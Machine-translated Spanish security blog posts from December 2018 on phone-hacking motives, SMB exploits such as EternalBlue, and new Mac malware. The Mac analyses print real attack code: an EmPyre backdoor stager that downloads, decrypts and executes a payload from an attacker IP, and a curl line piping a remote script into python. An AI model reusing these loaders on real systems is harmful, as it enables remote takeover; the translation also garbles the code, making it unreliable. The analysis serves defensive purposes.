Todas las razones por las que los cibercriminales quieren piratear tu teléfono.

Todas las razones por las que los cibercriminales quieren piratear tu teléfono.

Todas las razones por las que los cibercriminales quieren piratear tu teléfono.

Publicado: 18 de diciembre de 2018 por 
Última actualización: 17 de diciembre de 2018

Cuando la gente piensa en piratear, la mayoría se imagina computadoras de escritorio, computadoras portátiles o incluso cámaras de seguridad. Sin embargo, en los últimos años, los ciberdelincuentes han ampliado su repertorio para incluir también los teléfonos inteligentes. Aquí hay 10 razones por las que pueden estar buscando hackear tu teléfono.

1. Infectarlo con malware.

Muchos usuarios de teléfonos inteligentes asumen que pueden mantenerse a salvo del malware y otras amenazas al instalar aplicaciones antivirus en sus teléfonos y tener más cuidado con los sitios web que visitan. Por lo general, no esperan que sus teléfonos tengan malware fuera de la caja. Sin embargo, los investigadores demostraron que eso es lo que sucedió con más de tres docenas de modelos de Android , generalmente de marcas menos conocidas.

Los teléfonos tenían instalado un malware troyano antes de llegar a los usuarios, y el culpable parecía ser un proveedor de software en Shanghai que era un distribuidor compartido de una marca de software antivirus. Aunque no está claro qué querían hacer los piratas después de infectar los teléfonos, el malware fue particularmente difícil de eliminar. A menudo, implicaba reinstalar completamente el sistema operativo.

2. Para escuchar las llamadas.

Las personas usan sus teléfonos para hablar con sus seres queridos, hablar sobre planes de negocios, hablar sobre sus viajes, todo tipo de contenido personal e íntimo. Por lo tanto, no es sorprendente que los criminales quieran entrar y escuchar, ya sea para atacar a un objetivo o simplemente por placer voyerista. Pero, ¿cómo lo hacen?

Hay una falla en el intercambio de celulares en los EE. UU., La vulnerabilidad conocida como SS7, que permite a los piratas informáticos escuchar llamadas, leer textos y ver las ubicaciones de los usuarios después de conocer sus números de teléfono . A pesar de que las agencias estadounidenses conocen el problema, no han tomado medidas decisivas para solucionarlo, lo que pone en riesgo la privacidad de los estadounidenses.

3. robar dinero

Los ataques de ransomware causan dolores de cabeza a los usuarios de computadoras al hacer que las máquinas afectadas se bloqueen o retengan los archivos como rehenes hasta que la gente pague el rescate para restaurar el acceso. Incluso entonces, el pago no garantiza un retorno a la funcionalidad adecuada. Sin embargo, el ransomware no solo afecta a las computadoras. Hay una tendencia reciente de ransomware móvil , que a menudo se origina en aplicaciones maliciosas de terceros.

En un ejemplo, una aplicación de terceros prometió optimizar el sistema Android pero en realidad engañó a las personas para que transfirieran $ 1,000 de sus cuentas de PayPal . El proceso de inicio de sesión fue legítimo, por lo que no fue un intento de phishing. Sin embargo, una vez que la gente inició sesión, un troyano automatizó la transferencia de PayPal.

4. Para chantajear a la gente.

El crimen de chantaje no es nuevo, pero los actores de amenazas reconocen que la pequeña computadora en los bolsillos y carteras de las personas probablemente tiene más información personal almacenada que una computadora de escritorio o una computadora portátil. Y primero pueden impedir que las personas accedan a sus teléfonos antes de amenazar con filtrar la información que encuentren.

Los delincuentes pueden iniciar el pirateo después de obtener cierta información personal de una víctima que está disponible en el mercado negro debido a una violación anterior, no relacionada. Luego usan esa información para ponerse en contacto con la compañía telefónica de la víctima y hacerse pasar por el usuario, diciendo que quieren transferir el número a un nuevo teléfono. Las compañías telefónicas a menudo proporcionan dichos servicios y pueden transferir automáticamente información, incluidos números de teléfono, a un nuevo dispositivo. El problema es que, en este caso, el teléfono antiguo aún funciona, pero es inútil para la persona que lo posee.

Después de que los piratas informáticos tomen el control de un teléfono de esta manera, el escenario está preparado para delitos más graves, como el chantaje. Si una persona tenía números esenciales en su teléfono que no estaban respaldados en otra parte, fácilmente podrían sentirse presionados a ceder ante las demandas de los hackers para evitar peores consecuencias.

5. Dañar tu teléfono.

Los hackers sienten que han logrado un objetivo al provocar el caos para las víctimas. Una forma de hacerlo es hacer que el teléfono se sobrecaliente y finalmente arruinarlo. Los investigadores de seguridad advirtieron que los piratas informáticos podrían entrar en el procesador de un teléfono y utilizarlo para la criptomoneda . Además de desacelerar el teléfono, ¡también puede hacer que el teléfono se caliente demasiado o incluso que explote!

Hay muchos dispositivos de refrigeración confiables que se utilizan en los teléfonos celulares para la gestión de la temperatura, incluso las soluciones “inteligentes” de gestión de la temperatura que calientan la batería de su teléfono cuando hace demasiado frío y se enfrían cuando hace demasiado calor. Sin embargo, si los hackers se salen con la suya, incluso los componentes internos que normalmente son suficientes podrían dejar de mantener el dispositivo lo suficientemente fresco.

Un tipo de malware criptográfico llamado Loapi a menudo se oculta en aplicaciones que aparecen como juegos descargables. Los investigadores de seguridad realizaron una prueba y descubrieron que realmente hizo que la batería de un teléfono aumentara debido al calor excesivo después de solo dos días.

6. Amenazar a la seguridad nacional.

Innumerables analistas han intervenido para decir que el supuesto uso de dispositivos móviles inseguros por parte del presidente Trump podría ayudar a los adversarios extranjeros a recopilar información sobre los Estados Unidos que podría amenazar a la nación o al menos dar información sobre las acciones previstas del presidente.

En 2018, Billy Long, un congresista republicano, había pirateado su teléfono móvil y su cuenta de Twitter. Los ciberdelincuentes saben que una de las principales formas en que los políticos interactúan con sus seguidores es a través de las redes sociales.

Además de amenazar la seguridad nacional de manera más directa, estos piratas informáticos podrían erosionar la confianza que los políticos han creado con sus audiencias, especialmente con publicaciones falsas que parecen provenir de los verdaderos dueños de las cuentas.

Los ciberdelincuentes saben que al piratear los teléfonos móviles y las cuentas de redes sociales de los políticos, contribuyen a la opinión pública general de que no se puede confiar en los políticos. En lugar de buscar información en la fuente, los usuarios pueden buscar noticias a través de fuentes que son incluso menos confiables o diseñadas estratégicamente para difundir noticias falsas.

7. Por diversión o notoriedad.

Algunos hackers se emocionan al realizar sus ataques con éxito. El hacking es una fuente de entretenimiento para ellos, así como un impulso para el ego. Si el dinero no es el principal motivador para los delincuentes cibernéticos , la notoriedad podría ser un segundo lugar. Los piratas informáticos pueden entrar en los teléfonos porque es un desafío más reciente que podría requerir técnicas de desarrollo de malware más avanzadas. En última instancia, muchos ciberdelincuentes desean la aprobación de otros en la industria y desean su respeto.

8. Obtener información de pago.

Los monederos electrónicos, que almacenan la información de pago dentro de las aplicaciones de teléfonos inteligentes para que las personas no tengan que llevar tarjetas de crédito o débito reales, son convenientes. Sin embargo, su creciente popularidad ha dado a los piratas informáticos otra razón para apuntar a los teléfonos.

A menudo, los cibercriminales incitan a las personas a descargar aplicaciones de pago móviles falsas (por supuesto, creen que son reales). Luego, una vez que las personas ingresan su información de pago, los piratas informáticos tienen la información necesaria para cargar transacciones a las tarjetas.

9. Porque mucha gente lo usa.

Dado que los piratas informáticos quieren que sus ataques tengan beneficios importantes, saben que pueden aumentar sus posibilidades de tener un gran impacto al apuntar a los teléfonos inteligentes. La información publicada por el Pew Research Center muestra que el 95 por ciento de los estadounidenses posee teléfonos inteligentes . Para poner eso en perspectiva, solo el 35 por ciento de la población lo hizo en 2011, cuando la organización realizó por primera vez una encuesta sobre la propiedad de teléfonos inteligentes.

Además, una investigación diferente de otra organización revela que el uso de Internet móvil está superando al tiempo de escritorio. Las personas se sienten cada vez más cómodas con el uso de sus teléfonos inteligentes para conectarse, navegar e incluso comprar. Como tales, no importa qué tipo de hackers organizan los ciberdelincuentes, pueden encontrar muchas víctimas al enfocarse en usuarios de teléfonos inteligentes.

10. Porque es un blanco fácil.

La investigación muestra que las aplicaciones móviles tienen problemas de seguridad rampantes. Esto les da a los delincuentes la oportunidad de infiltrarse en aplicaciones inseguras en lugar de los teléfonos.

En un caso, aproximadamente 40 de las 50 aplicaciones de compras principales tenían al menos algunas vulnerabilidades de seguridad de alto nivel que permitían a los piratas informáticos ver información personal o engañar a los usuarios al atraerlos a aplicaciones peligrosas que eran copias de los originales.

Investigaciones adicionales sobre aplicaciones de citas problemáticas descubrieron que muchas de ellas brindan a terceros acceso a datos no cifrados a través de kits de desarrollo de software (SDK) vulnerables. Los hackers saben que algunas aplicaciones alcanzan cientos de miles, o incluso millones. de descargas. Si pueden acceder a ellos, obtendrán acceso rápido a los teléfonos que tienen esas aplicaciones instaladas y a las personas que las usan.

Cómo mantenerse protegido

Estos ejemplos muestran que los piratas informáticos tienen un sinnúmero de razones para hackear teléfonos y aún más formas de hacerlo realidad. Una forma fácil de protegerse contra los ataques es evitar las tiendas de aplicaciones de terceros y solo descargar contenido de las tiendas de aplicaciones legítimas del teléfono, como Google Play o iTunes. Sin embargo, los actores de amenazas también pueden penetrar en esas plataformas, y muchas aplicaciones infectadas o deshonestas se han abierto paso .

También es inteligente controlar las estadísticas del teléfono, como la duración de la batería y el número de aplicaciones en ejecución. Si se desvían demasiado de la norma, es una señal de que los piratas informáticos no son buenos para el fondo.

La ejecución de un análisis antivirus móvil al menos una vez al mes o la instalación de un programa de ciberseguridad siempre activo es otra buena estrategia, pero solo si la aplicación proviene de una fuente confiable , como el sitio oficial del proveedor.

En lugar de estar demasiado ansioso por descargar nuevas aplicaciones, lo ideal sería que la gente tenga precaución y solo lo haga si numerosas fuentes de comentarios indican que están libres de fallas de seguridad importantes. Algunas compañías de desarrollo de aplicaciones tienen tanta prisa por llegar al mercado con sus últimas ofertas que no hacen de la seguridad una prioridad.

Además de estos consejos más específicos, es esencial que las personas estén muy conscientes de cómo interactúan con sus teléfonos. Por ejemplo, las ventanas emergentes extrañas o las redirecciones en el navegador de un teléfono, o los íconos aleatorios que aparecen sin haber descargado una nueva aplicación podrían indicar problemas, y las personas no deben asumir que todo está bien. En caso de duda, es mejor dejar de usar el teléfono y obtener algunas respuestas, antes de que los piratas informáticos aprendan todo lo que necesitan saber sobre usted.

Una semana en seguridad Informatica (10 – 16 de diciembre).

Una semana en seguridad (10 - 16 de diciembre).

Una semana en seguridad (10 – 16 de diciembre).

Publicado: 17 de diciembre de 2018 por 

La semana pasada en Labs, echamos un vistazo a un nuevo malware para Mac , una colección de varios volcados de datos rastreados , la protección de las redes eléctricas y la forma en que los actores malos utilizan las vulnerabilidades de las PYMES . 

Otras noticias de ciberseguridad.

  • Millones afectados por el error de la API de fotos de Facebook: un problema otorgado a las aplicaciones de terceros más acceso a las fotos que normalmente debería otorgarse, incluidas las imágenes cargadas pero no publicadas. (fuente: Facebook)
  • Las amenazas de bomba pueden ser un engaño: un correo electrónico en circulación que exhorta a los pagos de rescate en Bitcoin para que no se detonen las bombas en los EE. UU. Puede ser una falsificación , según la policía estadounidense. (fuente: el registro)
  • Hombre encarcelado por delitos de fraude: un hombre en el Reino Unido ha sido encarcelado por participar en actividades fraudulentas. El principal punto de interés es seguramente el espectacular dispositivo que construyó. (fuente: Met Police)
  • Otro error de Google Plus: durante seis días, los desarrolladores pudieron acceder a datos de perfil quelos usuarios no hicieron públicos. (fuente: Google)
  • Recopilación de datos de Windows 10: los usuarios de Reddit se quejaron de que Windows 10 está capturando cierto tipo de datos, incluso con la configuración deshabilitada. (fuente: Cómo Geek)
  • El concierto de Taylor Swift rastrea a acosadores con software de reconocimiento facial: en un evento reciente, se implementó tecnología de vanguardia para garantizar que las multitudes estuvieran libres de posibles alborotadores . (Fuente: Rolling Stone)
  • Desastres de contraseñas de 2018: una mirada irónica a algunos de los contratiempos más espectaculares de contraseñas que se han visto este año. (Fuente: Help Net Security)
  • El troyano Android se roba de las cuentas de PayPal: incluso con 2FA habilitado, puede que no sea suficiente para mantener seguro el saldo de su cuenta. (Fuente: ESET)
  • El reconocimiento de caracteres recopila las URL en los videos de YouTube: en teoría, los datos privados en los videos ocultos pueden no ser tan privados como se esperaba. (Fuente: blog de Austin Burk)
  • Los datos de los viajeros se quedan en las memorias USB: los agentes de frontera no son tan cuidadosos como deberían en lo que respecta a los datos de pasajeros potencialmente sensibles. (Fuente: Naked Security)

¡Mantente a salvo, todos!

Cómo los actores de amenazas están utilizando las vulnerabilidades de las PYMES

Cómo los actores de amenazas están utilizando las vulnerabilidades de las PYMES

Cómo los actores de amenazas están utilizando las vulnerabilidades de las PYMES

Publicado: 14 de diciembre de 2018 por 

Algunas de las variantes de malware de ransomware y troyanos más devastadoras dependen de las vulnerabilidades en el Bloqueo de mensajes del servidor de Windows (SMB) para propagarse a través de la red de una organización. Windows SMB es un protocolo utilizado por las PC para compartir archivos e impresoras, así como para acceder a servicios remotos.

Microsoft lanzó un parche para las vulnerabilidades de SMB en marzo de 2017, pero muchas organizaciones y usuarios domésticos aún no lo han aplicado. Así que ahora, los sistemas no parcheados permiten amenazas que aprovechan estas vulnerabilidades en el interior, lo que ayuda a que las campañas de malware activo se propaguen como incendios forestales de California.

Las vulnerabilidades de SMB han sido tan exitosas para los actores de amenazas que se han utilizado en algunos de los brotes de ransomware más visibles y en los sofisticados ataques de troyanos de los últimos dos años. De hecho, la telemetría de nuestro producto ha registrado 5,315 detecciones de Emotet y 6,222 de TrickBot en redes empresariales, dos variantes de troyanos que utilizan las vulnerabilidades de SMB, solo en los últimos 30 días.

¿Qué los hace tan efectivos?

Lo que hace que un malware sea tan extendido es la forma en que se propaga. Si bien las campañas masivas de spam solo generan algunas víctimas que realmente rinden frutos, una infección similar a un gusano que se sigue propagando requiere poco esfuerzo para multiplicar los rendimientos. Y eso es exactamente lo que las vulnerabilidades de SMB permiten que hagan sus cargas útiles: se extienden lateralmente a través de sistemas conectados.

Por ejemplo, el ransomware WannaCry (también conocido como WannaCrypt), que usó una de las vulnerabilidades de SMB, se lanzó en mayo de 2017, pero la infección continúa expandiéndose. A continuación se muestra el gráfico que muestra nuestra telemetría para Ransom.WannaCrypt para el mes de noviembre de 2018 .

Han pasado más de 1,5 años, y WannaCry continúa proliferando, gracias a la gran cantidad de máquinas no parcheadas conectadas a redes infectadas.

¿Cómo se llegó a esto?

En este momento, hay tres exploits en la naturaleza que utilizan vulnerabilidades de SMB. Estas hazañas han sido bautizadas como EternalBlue (usada por WannaCry y Emotet), EternalRomance (NotPetya, Bad Rabbit y TrickBot), y EternalChampion. Hay una cuarta vulnerabilidad llamada EternalSynergy, pero solo hemos visto una Prueba de concepto (PoC), nada ha aparecido todavía en la naturaleza.

Todas estas hazañas fueron filtradas por el Grupo ShadowBrokers , quien supuestamente las robó de la NSA. Menos de un mes después de que los ShadowBrokers publicaran sus “hallazgos”, el primer malware completamente funcional que usó el exploit EternalBlue, WannaCry, se encontró en su hábitat natural.

Desde entonces, múltiples ataques de malware a gran escala se han basado en las vulnerabilidades de las PYMES para penetrar en las redes de las organizaciones, incluidas las campañas de ransomware NotPetya y Bad Rabbit en 2017, y ahora los ataques Emotet y TrickBot Trojan, que se han llevado a cabo durante el tercer y cuarto lugar. trimestre de 2018.

Ahora echemos un vistazo más cercano y técnico a cada exploit y cómo funcionan.

EternalBlue

Un error en el proceso de conversión de atributos extendidos de archivos (FEA) de la estructura OS2 a la estructura NT mediante la implementación de Windows SMB puede provocar un desbordamiento de búfer en el grupo del kernel no paginado. Este grupo no paginado consta de direcciones de memoria virtual que se garantiza que residen en la memoria física mientras se asignen los objetos del núcleo correspondientes.

Un desbordamiento de búfer es un defecto de programación que permite que los datos escritos en un área de memoria reservada (el búfer) salgan de los límites (desbordamiento), lo que le permite escribir datos en ubicaciones de memoria adyacentes. Esto significa que los atacantes pueden controlar el contenido de ciertas ubicaciones de memoria a las que no deberían poder acceder, que los atacantes explotan en su beneficio. En el caso de EternalBlue, pueden controlar el contenido de un montón que tiene permiso de ejecución, lo que lleva a la vulnerabilidad de ejecución remota de código (RCE), o la capacidad de ejecutar comandos en una máquina de destino a través de la red.

EternalRomance

Eternal Romance es un ataque RCE que explota CVE-2017-0145 contra el protocolo de intercambio de archivos SMBv1. Tenga en cuenta que el uso compartido de archivos a través de SMB normalmente se usa solo en redes locales, y los puertos SMB generalmente están bloqueados desde Internet por un firewall. Sin embargo, si un atacante tiene acceso a un punto extremo vulnerable que ejecuta SMB, la capacidad de ejecutar código arbitrario en el contexto del kernel desde una ubicación remota es un compromiso serio.

En el núcleo de este exploit se encuentra una vulnerabilidad de tipo confusión. Las vulnerabilidades de confusión de tipo son fallas de programación que ocurren cuando un fragmento de código no verifica el tipo de objeto que se le pasa antes de usarlo. La confusión de tipos puede permitir a un atacante introducir punteros o datos de función en el código incorrecto. En algunos casos, esto puede llevar a la ejecución del código.

En otros casos, la vulnerabilidad de la confusión de tipo conduce a una escritura de montón arbitraria, o la pulverización del montón La pulverización en heap es un método que se usa normalmente en explotaciones que coloca grandes cantidades de código en una ubicación de memoria que el atacante espera que se lea. Por lo general, estos bits de código apuntan al inicio del código real que el exploit desea ejecutar para comprometer el sistema que está bajo ataque.

Una vez finalizada la aplicación, el exploit utiliza una filtración de información en una transacción TRANS_PEEK_NMPIPE. Utiliza la filtración de información para determinar si el destino está ejecutando una versión de Windows de 32 o 64 bits y para obtener los punteros del kernel para varios objetos SMB.

Campeón Eterno

El problema explotado por EternalChampion es una condición de carrera en cómo SMBv1 maneja las transacciones. Una condición de carrera, o peligro de carrera, es el comportamiento de un sistema donde la salida depende de la secuencia o el tiempo de otros eventos incontrolables. Se convierte en un error cuando los eventos no ocurren en el orden previsto por el programador. A veces, estos errores pueden ser explotados cuando el resultado es predecible y funciona en beneficio de los atacantes.

Mientras tanto, una transacción es un tipo de solicitud que potencialmente puede abarcar varios paquetes. Por ejemplo, si una solicitud es demasiado grande para caber en un solo bloque de mensajes del servidor (SMB), se puede crear una transacción del tamaño apropiado, y esto almacenará los datos tal como se reciben de varias SMB.

Esta vulnerabilidad se explota de dos maneras: primero para una fuga de información y segundo para la ejecución remota de código. El error se explota primero para filtrar información de la agrupación a través de una lectura fuera de los límites. Para hacer esto, se envía al servidor un único paquete que contiene múltiples SMB. Este paquete contiene tres piezas relevantes:

  • Una solicitud de transacción primaria que se ejecutará de inmediato.
  • Una solicitud de transacción secundaria que activa el error causado por la condición de carrera.
  • Conjuntos de transacciones primarias que acumulan el grupo con la intención de colocar una estructura de transacción inmediatamente detrás de la que rastrea la primera solicitud de transacción primaria.

Primero, se crea una transacción que contiene el shellcode. Esto no inicia el exploit, solo contiene la carga útil de la segunda etapa. A continuación, se envía un paquete que contiene múltiples SMB. El paquete contiene todos los datos de transacción esperados y comienza la ejecución inmediatamente.

El controlador de transacción secundario copia los datos de la solicitud de transacción secundaria si encaja en el búfer. Excepto debido a la condición de carrera, el puntero ahora apunta a la pila del subproceso de los manejadores de solicitud de transacción primaria (a diferencia del búfer de agrupación esperado). Esto permite que un atacante escriba sus datos directamente en la pila de otro hilo.

El atacante tiene control sobre el desplazamiento, por lo que puede elegir la cantidad de datos para copiar y luego copiarlo. Esto les permite sobrescribir con precisión una dirección de retorno almacenada en la pila del subproceso del manejador de solicitud de transacción principal, y da como resultado la capacidad de ejecución remota de código.

Sinergia eterna

La Prueba de concepto para EternalSynergy muestra que los mensajes SMB entrantes son copiados por un controlador inicial en el búfer de transacción correspondiente. Pero el controlador asume automáticamente que la dirección proporcionada es el comienzo del búfer. Sin embargo, durante una transacción de escritura, se asume automáticamente que la misma dirección es el final de los datos existentes, y la dirección que apunta al comienzo del búfer se actualiza en consecuencia.

Esto significa que un atacante puede construir un mensaje secundario en la transacción para apuntar más allá del inicio del búfer, lo que resulta en un desbordamiento del búfer durante la acción de copia.

EternalRocks

Buscando información sobre estos exploits SMB, también puede encontrarse con un exploit llamado EternalRocks. EternalRocks no se incluyó en el lanzamiento de ShadowBrokers, sino que se construyó y se descubrió más tarde. EternalRocks usa siete herramientas NSA donde, por ejemplo, WannaCry solo usó dos (EternalBlue y otra llamada DoublePulsar).

Prevención y remediación.

A pesar del poder significativo que las vulnerabilidades de las PYMES tienen para los atacantes, existe un remedio simple para evitar que se vuelvan problemáticos.

Parche sus sistemas.

Los sistemas operativos de Windows vulnerables a los ataques que se encuentran en el mundo salvaje son anteriores a Windows 10. La mayoría de los ataques solo funcionan en Windows 7 y versiones anteriores, y Microsoft lanzó parches para las vulnerabilidades que se filtraron en el Boletín de seguridad de Microsoft MS17-010 . Esto deja poca o ninguna razón para que las redes sean vulnerables a estos ataques, sin embargo, el número de víctimas actuales es abrumador.

Al aplicar el parche lanzado por Microsoft en 2017, todos sus dolores de cabeza eternos pueden desaparecer mágicamente. Y como medida adicional, también le recomendamos que actualice y actualice todos los sistemas, navegadores y software lo antes posible para reforzar cualquier otra posible vulnerabilidad en la red.

Además, muchas soluciones de ciberseguridad, como Malwarebytes Endpoint Protection , ofrecen una tecnología innovadora contra la explotación que puede impedir que amenazas como EternalBlue dejen caer sus cargas útiles e infecten sistemas.

Por ejemplo, el módulo anti-exploit de Malwarebytes detectó a WannaCry como Ransom.WannaCryptdesde el principio. A continuación, creamos un mapa de calor utilizando nuestra telemetría, que muestra dónde comenzó la infección y qué tan rápido se extendió por todo el mundo.

Es por una buena razón que la mayoría de las guías de ciberseguridad aconsejan a los usuarios realizar parches rápidamente y mantener los sistemas actualizados. Muchas de las infecciones que se observan hoy podrían evitarse con un monitoreo constante y un mantenimiento básico de la computadora. Desafortunadamente, muchas empresas creen que no tienen el tiempo o la mano de obra para seguir este consejo. Pero cuando las empresas dejan sus redes desprotegidas, comprometen la integridad de todas nuestras experiencias en línea, especialmente cuando las vulnerabilidades de las PYMES permiten que las infecciones se propaguen tan rápidamente.

No seas una de esas empresas. ¡Protégete y mantente actualizado!

Ráfaga de nuevos malware para Mac cae en diciembre

Ráfaga de nuevos malware para Mac cae en diciembre

MAC | ANÁLISIS DE AMENAZAS

Ráfaga de nuevos malware para Mac cae en diciembre

Publicado: 11 de diciembre de 2018 por Thomas Reed

La semana pasada, escribimos sobre una nueva pieza de malware llamada DarthMiner . Resulta que había más cosas que ver, ya que no solo se habían detectado una, sino dos piezas de malware adicionales. El primero fue identificado por John Lambert de Microsoft y analizado por Patrick Wardle de Objective-See, y el segundo fue encontrado por Adam Thomas de Malwarebytes.

Un documento de Word con una macro maliciosa.

Lambert identificó un documento malintencionado de Microsoft Word que  contenía una macro maliciosa de Visual Basic en un tweet que proporcionaba un enlace VirusTotal al archivo. Wardle analizó el documento , que se llamó BitcoinMagazine-Quidax_InterviewQuestions_2018.docm , y la carga útil que se eliminó.

Por lo general, las macros en los documentos de Microsoft Office están en un espacio aislado, lo que significa que no deberían tener ninguna capacidad para realizar cambios en el sistema de archivos. Sin embargo, en este caso, el documento utiliza un escape de sandbox para crear un agente de inicio en el sistema. Este agente de inicio proporciona persistencia a un script de Python que configura una puertatrasera Meterpreter .

Curiosamente, este malware es un trabajo de copiar y pegar de una prueba de concepto publicada por Adam Chester en febrero, incluso para reciclar los identificadores que se refieren al sitio del blog de Chester, excepto que Chester formuló la hipótesis con EmPyre en lugar de Meterpreter como el puerta trasera.

Por supuesto, el ataque se basa en que el usuario abra un documento malicioso de Word y permita que se ejecuten las macros, por lo que la ingeniería social es la trampa principal. Mientras que nunca, nuncapermite que las macros se ejecuten en documentos de Microsoft Office, que está a salvo de este tipo de software malicioso.

Un imitador malicioso de la discordia.

El viernes, Adam Thomas encontró una copia maliciosa de Discord, una aplicación para que los jugadores se comuniquen con otros jugadores. Sin embargo, esta copia de Discord no parecía hacer nada, porque en realidad era un script de Automator que no hacía nada por el usuario.

La secuencia de comandos, que se muestra en el formulario editado anteriormente para ajustarse a una captura de pantalla, decodifica y ejecuta una carga útil de Python, luego comienza a tomar capturas de pantalla repetidamente y las carga en un servidor de comando y control (C&C).

La carga útil decodificada incluye un poco de código Python, incluidos dos fragmentos adicionales de Python codificado en base64. Uno de estos bits de código configura una puerta trasera EmPyre:

qPnQAZwbqBZ = 'PBlqIV'
import sys, urllib2; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep"
ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE)
out = ps.stdout.read ()
ps.stdout.close ()
Si re.search ("Little Snitch", fuera):
   sys.exit ()
o = __ importar __ ({2: 'urllib2', 3: 'urllib.request'} [sys.version_info [0]], fromlist = ['build_opener']). build_opener (); UA = 'Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.11; rv: 45.0) Gecko / 20100101 Firefox / 45.0 '; o.addheaders = [(' User-Agent ', UA)]; a = o.open (' http://37.1.221.204:8080 /index.asp '). read (); key =' 7b3639a4ab39765739a5e0ed75bc8016 '; S, j, out = range (256), 0, []
para i en rango (256):
    j = (j + S [i] + ord (clave [i% len (clave)]))% 256
    S [i], S [j] = S [j], S [i]
i = j = 0
para char en un:
    i = (i + 1)% 256
    j = (j + S [i])% 256
    S [i], S [j] = S [j], S [i]
    out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256]))
exec (''. join (out))

La secuencia de comandos también configura un agente de inicio denominado  com.apple.systemkeeper.plist , que mantiene de forma persistente el código de captura de pantalla y el código de puerta trasera EmPyre en ejecución.

Este malware no es realmente convincente, ya que no hace nada en absoluto para pretender que es una aplicación legítima de Discord. No es una copia maliciosamente modificada de la aplicación Discord. Ni siquiera incluye y lanza una copia de la aplicación Discord, que podría hacer fácilmente como un subterfugio para hacer que la aplicación parezca legítima. Para el caso, ¡ni siquiera usa un icono convincente!

En su lugar, el malware utiliza un icono genérico de applet de Automator, y todo lo que sucede cuando se ejecuta es que aparece un icono de engranaje en la barra de menú (como es normal en cualquier secuencia de comandos de Automator).

Por supuesto, cuando el usuario nota que algo está mal, el malware ha configurado el agente de inicio, abrió la puerta trasera y envió algunas capturas de pantalla. Muchos usuarios pueden notar que algo está apagado, pero es posible que no sepan qué hacer al respecto.

Similitudes interesantes

Hay algunas similitudes interesantes entre este malware falso de Discord, que Malwarebytes detecta como OSX.LamePyre , y el malware OSX.DarthMiner descubierto a principios de esta semana. Ambos se distribuyen en forma de applets de Automator, ambos ejecutan scripts de Python y ambos usan una puerta trasera EmPyre.

Sin embargo, también hay algunas diferencias. Los medios para ejecutar el script de Python son diferentes en estos dos casos. Además, el propósito primario aparente para el malware también es diferente: la criptomina, en el caso de DarthMiner, y las capturas de pantalla, en el caso de LamePyre.

Parece probable que estos puedan ser hechos por la misma persona, pero también es posible que uno sea un imitador de la otra.

El malware de macro de Word (que Malwarebytes actualmente detecta como OSX.BadWord , por falta de un nombre oficial) también configura una puerta trasera utilizando Python, y al igual que OSX.DarthMiner, ejecuta el código Python directamente en el agente de lanzamiento, que es algo inusual . Por supuesto, utiliza una puerta trasera diferente y un método de entrega diferente.

Los tres han hecho un uso intensivo del código prestado en forma de puertas traseras de código abierto (EmPyre en dos casos, el módulo Meterpreter de Metasploit en el tercero), así como copiar y pegar el código de vulnerabilidad VBA directamente desde el blog de un investigador.

Dos malware, un creador?

Las similitudes entre todos estos malware, así como la estrecha coincidencia en el tiempo (todos se enviaron por primera vez a VirusTotal en un período de aproximadamente un mes), pueden significar que todos fueron creados por el mismo desarrollador de malware.

Sin embargo, no hay evidencia concreta para esa suposición en este momento. Las direcciones IP con las que se comunican estas piezas de malware están distribuidas por todo el mundo en los EE. UU., Luxemburgo, Alemania y los Países Bajos, y no hay conexiones obvias entre ellas. El código es similar, pero no idéntico.

En este momento, estamos llamando a cada uno de ellos con un nombre diferente, pero seguiremos investigando.

Mientras tanto, las mejores cosas que puede hacer para mantenerse a salvo son:

  • No permitir que las macros se ejecuten en documentos de Microsoft Office
  • No descargue software de ningún otro sitio que no sea el sitio oficial del desarrollador, y especialmente no los sitios de piratería
  • No abra nada que le haya enviado por correo electrónico a menos que conozca al remitente y lo estuviera esperando.
  • Si abre una aplicación recién descargada y algo no funciona como se esperaba, consulte con el desarrollador

Una semana en seguridad Informática (3 – 9 de diciembre)

Una semana en seguridad (3 - 9 de diciembre)

MUNDO DE SEGURIDAD | SEMANA EN SEGURIDAD

Una semana en seguridad (3 – 9 de diciembre)

Publicado: 10 de diciembre de 2018 por Malwarebytes Labs.

La semana pasada en Malwarebytes Labs, brindamos a los lectores un FYI sobre múltiples violaciones que afectaron a Humble Bundle , Quora y Dunkin ‘Donuts , por nombrar algunas. Esto sigue al anuncio de Marriott sobre una brecha de cuatro años que afectó a medio billón de sus clientes .

También publicamos el informe “Bajo el radar: el futuro del malware no detectado” , en el que examinamos las amenazas actuales y las tecnologías que no están preparadas para ellas. Puede descargar el informe directamente aquí .

Finalmente, descubrimos un nuevo malware para Mac , que combina las capacidades de la puerta trasera  Empyre y el minero XMRig , e informamos sobre una nueva  vulnerabilidad de Adobe Flash de día cero que se usó contra una instalación rusa  en una campaña de ataque dirigida.

Otras noticias de ciberseguridad:

¡Mantenerse a salvo!

El malware de Mac combina la puerta trasera EmPyre y el minero XMRig

El malware de Mac combina la puerta trasera EmPyre y el minero XMRig

MAC | ANÁLISIS DE AMENAZAS

El malware de Mac combina la puerta trasera EmPyre y el minero XMRig

Publicado: 7 de diciembre de 2018 por Thomas Reed

A principios de esta semana, descubrimos una nueva pieza de malware para Mac que combina dos herramientas de código abierto diferentes, la puerta trasera EmPyre y el cryptominer XMRig, con el propósito del mal.

El malware se distribuía a través de una aplicación llamada Adobe Zii. Adobe Zii es un software diseñado para ayudar en la piratería de una variedad de aplicaciones de Adobe. En este caso, sin embargo, la aplicación se llamaba Adobe Zii, pero definitivamente no era la cosa real.

Como se puede ver en las capturas de pantalla anteriores, el software real Adobe Zii, a la izquierda, utiliza el logotipo de Adobe Creative Cloud. (Después de todo, si va a escribir un software para ayudar a las personas a robar el software de Adobe, ¿por qué no robar el logotipo también?) Sin embargo, el instalador de malware utiliza un icono genérico de applet Automator.

Comportamiento

Al abrir la aplicación Adobe Zii falsa con Automator se revela la naturaleza del software, ya que simplemente ejecuta un script de shell:

curl https://ptpb.pw/jj9a | python - & s = 46.226.108.171: 80; curl $ s / sample.zip -o sample.zip; descomprimir sample.zip -d muestra; muestra de cd; cd __MACOSX; abrir -a sample.app

Esta secuencia de comandos está diseñada para descargar y ejecutar una secuencia de comandos de Python, luego descargar y ejecutar una aplicación llamada sample.app.

El sample.app es simple. Parece ser simplemente una versión de Adobe Zii, probablemente con el propósito de hacer que parezca que el malware es realmente “legítimo”. (Esto no implica que la piratería de software sea legítima, por supuesto, sino que significa que el malware intentaba parecer que estaba haciendo lo que el usuario pensaba que tenía la intención de hacer.)
